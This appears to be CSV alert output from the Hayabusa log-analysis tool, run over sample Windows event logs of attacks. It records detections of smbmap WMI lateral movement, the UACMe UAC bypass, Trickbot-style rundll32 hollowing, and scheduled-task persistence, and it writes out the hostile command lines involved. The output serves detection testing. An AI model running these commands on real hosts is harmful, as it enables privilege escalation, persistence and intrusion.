-2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : 
User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe 
c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx -2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: 
NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData 
Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 
4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx -2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : 
Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx -2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: 
https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform 
Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx -2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
